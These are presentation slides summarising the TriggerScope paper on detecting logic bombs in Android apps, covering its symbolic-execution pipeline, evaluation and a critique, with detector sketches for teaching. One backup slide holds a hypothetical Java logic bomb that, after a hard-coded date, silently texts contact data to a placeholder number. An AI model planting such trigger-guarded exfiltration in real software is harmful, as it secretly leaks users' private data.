TriggerScope: Towards Detecting Logic Bombs in Android Applications
[Fratantonio, Yanick, Antonio Bianchi, William Robertson, Engin Kirda, Christopher Kruegel, and Giovanni Vigna. "TriggerScope: Towards Detecting Logic Bombs in Android Applications." In 2016 IEEE Symposium on Security and Privacy (SP), pp. 377-396. IEEE, 2016.]
Presented by Suzzie Yang

Threats to applications
• Malicious application logic
• Violates the expectations of the users
• Leakage of private, sensitive data, e.g. contextual information, GPS location, personal accounts
• Sophisticated malware designs increase stealthiness and make the malware difficult to prevent and detect

What is a logic bomb?
• Functionality guarded by condition-check statements
• The malware is only activated under certain circumstances
• May appear as a perfectly legitimate action
• Bypasses automatic analysis systems
• Example: a navigation-type app
  • Time-related checks
  • Location checks
The attack is triggered only under certain, narrow circumstances (a hypothetical code sketch is given in the backup slides after the Questions slide)

State-of-the-art analysis
• Static analysis
  • Based on permission sets
  • Machine learning techniques
• Dynamic analysis
  • Executes the app and analyses data in real time
  • Modifications to the Android framework and native libraries
• The main purpose of these approaches is malware detection
• Definitions of an application's specific purpose and "normal" functionality are lacking

Proposed system: TriggerScope
• Trigger analysis technique
• Triggers are suspicious predicates (or checks)
• Suspicious checks test for very specific conditions
• Focus on characterising the predicates
• Less attention is paid to the behaviour itself
• Time-, location- and SMS-related predicates
Identifies triggered malware through the identification of logic bombs

Overview of trigger analysis (1)
• Input: Android app Dalvik bytecode
• Step 1: Symbolic execution
  • Records operations on relevant objects
  • Values are annotated with expression trees
• Step 2: Predicate extraction
  • Backward traversal of the control-flow graph (CFG)
  • Removes false dependencies
  • Recovers intra-procedural path predicates

Overview of trigger analysis (2)
• Step 3: Predicate characterisation
  • Appraises how suspicious/narrow a predicate is (see the second backup sketch)
  • Based on the type of comparison performed
• Step 4: Control dependencies
  • Checks whether a suspicious predicate guards a sensitive operation
  • Inter-procedural
• Step 5: Post-filter
  • Filters out cases that match the definition of suspiciousness but are clearly benign
• Output: each app classified as suspicious or benign

Experiment
• Dataset
  • 9,582 benign apps: a mix of apps using time-, location- and SMS-related APIs
  • 14 malicious apps: developed by a DARPA red team, plus real-world malware
• Result: 35 out of 9,582 benign apps flagged as suspicious

Accuracy evaluation
Each consecutive analysis step reduced the false positive rate, down to 0.38%

Criticism
1. The authors appear to consider only cases where predicates are checked against hard-coded object values
  • The trigger may be invoked by other means, such as over the network
  • Values may be modified indirectly under different circumstances
2. Since the focus is on triggers and not their behaviour, the paper adopts a lenient approach to flagging suspiciousness
  • This contributes to the 0% false negative rate, since the majority of checks are treated as interesting potential suspicious predicates

Thank you
Questions?
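Backup: what a logic bomb can look like in code
A minimal, hypothetical Java sketch of the pattern TriggerScope targets: a narrow, hard-coded time comparison guarding a sensitive operation (here, SMS exfiltration), while the benign functionality runs unconditionally. The class name, method names, phone number, and date are illustrative assumptions, not taken from the paper.

```java
import android.telephony.SmsManager;
import java.util.Calendar;

// Hypothetical time-based logic bomb: the malicious payload runs only after a
// hard-coded date, so dynamic analysis performed before that date never
// observes the sensitive behaviour.
public class SyncService {

    public void onSync(String contactsDump) {
        Calendar now = Calendar.getInstance();

        // Suspicious (narrow) predicate: time values compared against
        // hard-coded constants. TriggerScope flags checks of this shape.
        if (now.get(Calendar.YEAR) == 2016 && now.get(Calendar.MONTH) >= Calendar.MARCH) {
            exfiltrate(contactsDump);
        }

        // Benign-looking functionality executes unconditionally, so the app
        // appears legitimate during testing performed before the trigger date.
        syncWithServer(contactsDump);
    }

    // Sensitive operation guarded by the trigger: silently leaks data via SMS.
    // The destination number is a placeholder for illustration only.
    private void exfiltrate(String data) {
        SmsManager.getDefault().sendTextMessage("+15551234567", null, data, null, null);
    }

    private void syncWithServer(String data) {
        // ... legitimate synchronisation logic ...
    }
}
```

The if statement is the trigger; the call to exfiltrate() is the guarded sensitive operation that Step 4 (control dependency analysis) looks for.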
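Backup: sketch of Step 3, predicate characterisation
This is not the paper's implementation. It is a minimal, self-contained Java sketch, under assumed data structures, of the core idea: a predicate is treated as suspicious when a value derived from a time-, location- or SMS-related API is compared against a hard-coded constant with a narrow operator such as equality. All class, enum, and method names are assumptions for illustration.

```java
// Minimal sketch (assumed data structures, not the paper's code) of how a
// recovered path predicate could be characterised as suspicious.
public class PredicateCharacteriser {

    // Simplified expression-tree node, as produced by symbolic execution (Step 1).
    static class Expr {
        enum Kind { TIME_API, LOCATION_API, SMS_BODY, CONSTANT, OTHER }
        final Kind kind;
        Expr(Kind kind) { this.kind = kind; }
    }

    // A path predicate recovered from the CFG (Step 2): left <op> right.
    static class Predicate {
        enum Op { EQ, NEQ, LT, GT }
        final Expr left, right;
        final Op op;
        Predicate(Expr left, Op op, Expr right) {
            this.left = left; this.op = op; this.right = right;
        }
    }

    // A predicate is suspicious if a sensitive source is compared against a
    // hard-coded constant using a narrow (equality) comparison; plain range
    // checks are treated as a weaker signal in this sketch.
    static boolean isSuspicious(Predicate p) {
        boolean sensitiveVsConstant =
                (isSensitive(p.left) && p.right.kind == Expr.Kind.CONSTANT)
             || (isSensitive(p.right) && p.left.kind == Expr.Kind.CONSTANT);
        return sensitiveVsConstant && p.op == Predicate.Op.EQ;
    }

    static boolean isSensitive(Expr e) {
        return e.kind == Expr.Kind.TIME_API
            || e.kind == Expr.Kind.LOCATION_API
            || e.kind == Expr.Kind.SMS_BODY;
    }

    public static void main(String[] args) {
        // Example: "currentTime == <hard-coded constant>" is flagged.
        Predicate timeBomb = new Predicate(
                new Expr(Expr.Kind.TIME_API), Predicate.Op.EQ, new Expr(Expr.Kind.CONSTANT));
        System.out.println(isSuspicious(timeBomb)); // prints: true
    }
}
```

The paper's actual characterisation is based on the type of comparison performed and is richer than this single boolean check; the sketch only captures the "narrow comparison against a hard-coded value" intuition.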